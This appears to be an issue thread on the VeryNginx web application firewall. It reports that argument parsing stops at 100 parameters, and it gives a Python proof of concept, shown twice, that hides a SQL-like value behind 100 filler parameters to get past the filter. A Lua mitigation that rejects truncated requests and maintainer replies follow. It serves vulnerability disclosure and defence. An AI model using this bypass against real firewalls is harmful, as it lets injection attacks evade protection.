VeryNginx
args block can be bypassed because of the lack of error handle
get_post_args and get_uri_args only take the first 100 parameters by default. If an attacker submits 100 useless parameters followed by the injected parameter, the WAF will be bypassed. Proof-of-concept Python script:

```python
import requests

# 100 filler parameters, then the payload that the WAF should block
args = 'a=1' + '&a=1' * 99
sqli = 'b=select*from'

r1 = requests.get('http://127.0.0.1/?' + sqli)
print(r1.url)
print(r1.status_code)
# returns 403

r2 = requests.get('http://127.0.0.1/?' + args + '&' + sqli)
print(r2.url)
print(r2.status_code)
# returns 200
```
The official recommendation is to use the following code to reject requests with too many parameters:

```lua
local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
end
```
get_post_args and get_uri_args will only return 100 args by default. If an attacker adds 100 args before the actual attack argument, the WAF will be bypassed. POC in Python:

```python
import requests

# 100 filler parameters, then the payload that the WAF should block
args = 'a=1' + '&a=1' * 99
sqli = 'b=select*from'

r1 = requests.get('http://127.0.0.1/?' + sqli)
print(r1.url)
print(r1.status_code)
# 403

r2 = requests.get('http://127.0.0.1/?' + args + '&' + sqli)
print(r2.url)
print(r2.status_code)
# 200
```
The official doc's advice is to use the following code to reject the request.

```lua
local args, err = ngx.req.get_post_args()
if err == "truncated" then
    -- one can choose to ignore or reject the current request here
end
```
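The snippet from the lua-nginx-module docs only handles the POST side; the POC above goes through the query string, so a fix has to check `ngx.req.get_uri_args` as well. The following is an added example (not VeryNginx's own code) of how a WAF's argument-collection step can refuse any request whose argument list was truncated, for both URI and POST arguments; the function name `collect_args_or_reject` and the `max_args` knob are assumptions, and the 100-entry default is the module's documented limit.

```lua
-- Added example, not VeryNginx's own code.
-- Collect URI and POST arguments for inspection, and reject the request
-- outright if either list was cut off by the max_args limit, so that a
-- payload hidden behind filler parameters is never silently skipped.
local function collect_args_or_reject(max_args)
    -- lua-nginx-module caps both calls at 100 entries by default; the
    -- second return value is the string "truncated" when the cap was hit.
    max_args = max_args or 100

    local uri_args, err = ngx.req.get_uri_args(max_args)
    if err == "truncated" then
        ngx.log(ngx.WARN, "URI args truncated at ", max_args,
                " entries; rejecting request from ", ngx.var.remote_addr)
        return ngx.exit(ngx.HTTP_FORBIDDEN)
    end

    -- The body must be read before get_post_args can see it.
    ngx.req.read_body()
    local post_args, perr = ngx.req.get_post_args(max_args)
    if perr == "truncated" then
        ngx.log(ngx.WARN, "POST args truncated at ", max_args,
                " entries; rejecting request from ", ngx.var.remote_addr)
        return ngx.exit(ngx.HTTP_FORBIDDEN)
    elseif perr then
        -- e.g. body buffered to a temp file; fail closed rather than
        -- inspect an incomplete view of the parameters.
        ngx.log(ngx.WARN, "cannot read POST args: ", perr)
        return ngx.exit(ngx.HTTP_FORBIDDEN)
    end

    -- Only now is it safe to run the WAF's matchers over every parameter:
    -- each key/value pair is guaranteed to be present in these tables.
    return uri_args, post_args or {}
end

-- Usage inside the phase where the WAF runs, e.g.:
--   access_by_lua_block { collect_args_or_reject(100) }
return collect_args_or_reject
```

Rejecting with 403 when `err == "truncated"` closes the bypass without raising the limit; raising `max_args` (or passing 0 for no limit) trades the bypass for a larger parsing cost per request, which is why the docs leave the choice to the operator.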
Thanks, this is indeed a vulnerability. You're welcome to submit a PR to fix it, or I'll come back and fix it myself when I'm less busy in a while.
Is this issue already fixed ? Kind regards!